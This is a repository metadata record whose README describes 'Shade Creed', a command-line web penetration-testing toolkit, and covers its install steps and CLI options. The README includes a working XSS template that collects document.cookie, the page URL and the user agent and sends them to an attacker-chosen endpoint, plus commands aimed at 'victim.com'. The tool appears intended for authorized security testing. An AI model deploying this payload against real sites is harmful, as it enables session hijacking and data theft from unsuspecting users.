{"id":28974976,"url":"https://github.com/harkerbyte/shadecreed","last_synced_at":"2026-02-02T03:32:16.441Z","repository":{"id":300998244,"uuid":"1002957459","full_name":"harkerbyte/shadecreed","owner":"harkerbyte","description":"command-line penetration testing toolkit designed for web application assessment","archived":false,"fork":false,"pushed_at":"2025-12-21T08:40:14.000Z","size":414,"stargazers_count":6,"open_issues_count":0,"forks_count":3,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-12-23T01:52:37.291Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/harkerbyte.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-06-16T12:03:03.000Z","updated_at":"2025-12-21T08:38:19.000Z","dependencies_parsed_at":"2025-06-24T17:09:20.494Z","dependency_job_id":"099a62ab-d83e-4ee5-bfa3-c08d6cd8316c","html_url":"https://github.com/harkerbyte/shadecreed","commit_stats":null,"previous_names":["harkerbyte/shadecreed"],"tags_count":10,"template":false,"template_full_name":null,"purl":"pkg:github/harkerbyte/shadecreed","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/harkerbyte%2Fshadecreed","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/harkerbyte%2Fshadecreed/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/harkerbyte%2Fshadecreed/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/harkerbyte%2Fshadecreed/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/harkerbyte","download_url":"https://codeload.github.com/harkerbyte/shadecreed/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/harkerbyte%2Fshadecreed/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29003228,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-02T01:32:03.847Z","status":"online","status_checked_at":"2026-02-02T02:00:07.448Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-06-24T12:07:43.463Z","updated_at":"2026-02-02T03:32:16.414Z","avatar_url":"https://github.com/harkerbyte.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"![PyPI - Version](https://img.shields.io/pypi/v/shadecreed?color=blue\u0026label=PyPI)\n[![PyPI Downloads](https://static.pepy.tech/personalized-badge/shadecreed?period=total\u0026units=INTERNATIONAL_SYSTEM\u0026left_color=BLACK\u0026right_color=BLUE\u0026left_text=downloads)](https://pepy.tech/projects/shadecreed)\n![Platform](https://img.shields.io/badge/platform-linux%20%7C%20macos%20%7C%20windows%20%7C%20android-lightgrey)\n![License](https://img.shields.io/pypi/l/shadecreed?color=yellow)\n\u003ca href = \"https://facebook.com/harkerbyte\"\u003e![Facebook](https://img.shields.io/badge/Facebook-%231877F2.svg?style=flat\u0026logo=Facebook\u0026logoColor=white)\u003c/a\u003e\n\u003ca href =\"https://youtube.com/@harkerbyte\" \u003e![YouTube](https://img.shields.io/badge/YouTube-%23FF0000.svg?style=flat\u0026logo=YouTube\u0026logoColor=white)\u003c/a\u003e\n\u003ca href=\"https://whatsapp.com/channel/0029Vb5f98Z90x2p6S1rhT0S\"\u003e![WhatsApp](https://img.shields.io/badge/WhatsApp-25D366?style=flat\u0026logo=whatsapp\u0026logoColor=white)\u003c/a\u003e\n\u003ca href=\"https://instagram.com/harkerbyte\" \u003e\n![Instagram](https://img.shields.io/badge/Instagram-E4405F?style=flat\u0026amp;logo=instagram\u0026amp;logoColor=white) \u003c/a\u003e\n\n\n\nShade Creed is a command-line penetration testing toolkit designed for web application assessment. It provides tools to inject custom headers, deploy and test XSS payloads, and scan for common vulnerabilities. Built with modularity in mind, it allows you to dynamically customize and deploy payloads for real-world testing scenarios.\n\n**Version**: 1.14.9\n**Platform**: Linux / Android \u0026 Cross platform compatible \n\n---\n\n## ✨ Features\n- Custom HTTP/HTTPS header injection (supports multiple methods)\n- Dynamic XSS payload creation and deployment\n- Lightweight vulnerability scanner\n- Quick bruteforce setup\n- Proxy support (basic)\n\n\n---\n## 📦 Installation\n```bash\npip install shadecreed\n```\n---\n## Additional packages : cloudflared \u0026\u0026 Chromium\n**Installation:**\n##### Android (termux)\n```bash\npkg install cloudflared\n``` \n```bash\npkg install x11-repo tur-repo chromium\n```\n##### Macos \n```bash\nbrew install cloudflared \n```\n```bash\nbrew install --cask chromium\n```\n##### Windows\n**cloudflared:**\n1. Visit the official download page:\n👉 https://developers.cloudflare.com/cloudflared/install-windows\n2. Download the latest cloudflared-windows-amd64.exe.\n3. Rename the downloaded file to cloudflared.exe.\n4. Move it to a folder like C:\\cloudflared\\.\n5. Add that folder to your System PATH:\nOpen System Properties \u003e Environment Variables\nUnder System variables, find and edit Path\nAdd: C:\\cloudflared\\\n6. Verify installation:\ncloudflared --version\n\n**chromium:**\n1. Find a reliable source: Websites like [Woolyss](https://chromium.woolyss.com/download/) offer pre-built versions of Chromium. \n2. Download the appropriate version: Choose the correct 32-bit or 64-bit version for your system. \n3. Run the installer: Follow the on-screen instructions to install Chromium. \n4. Test the installation: Launch Chromium and verify that it opens and functions correctly.\n\n##### Linux distros \n\n**Download the latest cloudflared binary:**\n```bash \nwget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64\n```\n\n**Make it executable:**\n```bash\nchmod +x cloudflared-linux-amd64\n```\n\n**Move it to a directory in your system PATH:**\n```bash\nsudo mv cloudflared-linux-amd64 /usr/local/bin/cloudflared\n```\n\n**Verify installation:**\n```bash\ncloudflared --version\n```\n\n**For chromium installation, help yourself.**\n\n---\n\n## ⚙️ CLI Tools\n\n### 1. `shadecreed`\n#### Description:\nMain entry point for the framework.\n\n```bash\nusage: shadecreed [-h] -u URL\n```\n\n**Options:**\n- `-h`, `--help`         Show help message and exit\n- `-u URL`, `--url URL`  Target URL to launch framework\n- `-v`, `--version` Display version\n---\n\n### 2. `shadecreed-inject`\n#### Description:\nInjects custom headers into HTTP(S) requests.\n\n```bash\nusage: shadecreed-inject [-h] -u URL [-m {GET,POST,PUT,DELETE}] [-s HEADER] [-p PROXY] [-r REDIRECT]\n```\n\n**Options:**\n- `-h`, `--help`                          Show help message and exit\n- `-u URL`, `--url URL`                  Target URL\n- `-m`, `--method` {GET,POST,PUT,DELETE}  HTTP method to use (default: GET)\n- `-s HEADER`, `--header HEADER`         Path to custom headers JSON\n- `-p PROXY`, `--proxy PROXY`            Proxy in format `host:port`\n- `-r REDIRECT`, `--redirect REDIRECT`   true - allow redirect otherwise do not provide this flag\n---\n\n### 3. `shadecreed-xss`\n#### Description:\nCustomize and deploy XSS payloads to dynamic endpoints.\n\n```bash\nusage: shadecreed-xss [-h] -u, --url URL [--script SCRIPT] [--endpoint ENDPOINT]\n```\n\n**Options:**\n- `-h`, `--help`              Show help message and exit\n- `--url URL`                 Target URL\n- `--script SCRIPT`           Path to XSS script template\n- `--endpoint ENDPOINT`       Custom receiving endpoint\n\n---\n\n### 4. `shadecreed-scan`\n#### Description:\nScans a target for vulnerabilities.\n\n```bash\nusage: shadecreed-scan [-h] --url URL\n```\n\n**Options:**\n- `-h`, `--help`      Show help message and exit\n- `--url URL`         Target URL\n\n---\n### 5. `shadecreed-brute`\n#### Description: \nRun custom brute force on admin login pages.\n```bash\nshadecreed-brute [-h] --url URL --redirect [true]\n```\n⚠️ Note: To prevent abuse, it can only attempt 10 passwords.\n\n**Options:**\n- `-h`, `--help`  Show help message and exit\n- `-u`, `--url`  Target URL\n- `-r`, `--redirect` [true] - if you intend to allow redirects otherwise, do not provide this flag. \n---\n\n## 📂 Example Commands\n\n**Run the main framework:**\n```bash\nshadecreed -u https://example.com\n```\n\n**Inject custom header using POST:**\n```bash\nshadecreed-inject -u https://target.com/api -m POST -s headers.json/.scdb -r true\n```\n\n**Deploy custom XSS script:**\n```bash\nshadecreed-xss --url https://target.com/page --script payload.js --endpoint https://mycustomendpoint.com/log\n```\n\n**Test custom endpoint:**\n```bash\nshadecreed-test \u003cCustom_Endpoint\u003e\n```\n\n**Scan a site for vulnerabilities:**\n```bash\nshadecreed-scan --url https://victim.com\n```\n\n**Perform custom bruteforce:**\n```bash\nshadecreed-brute --url https://myhome/admin --redirect true\n```\n\n---\n\n## 🕷️ Custom XSS Template\nYou can craft custom XSS scripts using the `{{endpoint}}` placeholder which will be replaced during deployment:\n\n```javascript\n\u003cscript\u003e\n  var data = {\n    cookies: document.cookie,\n    location: window.location.href,\n    userAgent: navigator.userAgent\n  };\n  fetch(\"{{endpoint}}\", {\n    method: \"POST\",\n    headers: { \"Content-Type\": \"application/json\" },\n    body: JSON.stringify(data)\n  });\n\u003c/script\u003e\n```\n\nSave the above as `payload.js` and pass it using the `--script` flag.\n\n---\n\n## ⚠️ Disclaimer\nShade Creed is built for **educational** and **authorized security testing** only. The developer is not responsible for any misuse or illegal activity.\n\n---\n\nGoodluck Pentesting! ✨\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fharkerbyte%2Fshadecreed","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fharkerbyte%2Fshadecreed","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fharkerbyte%2Fshadecreed/lists"}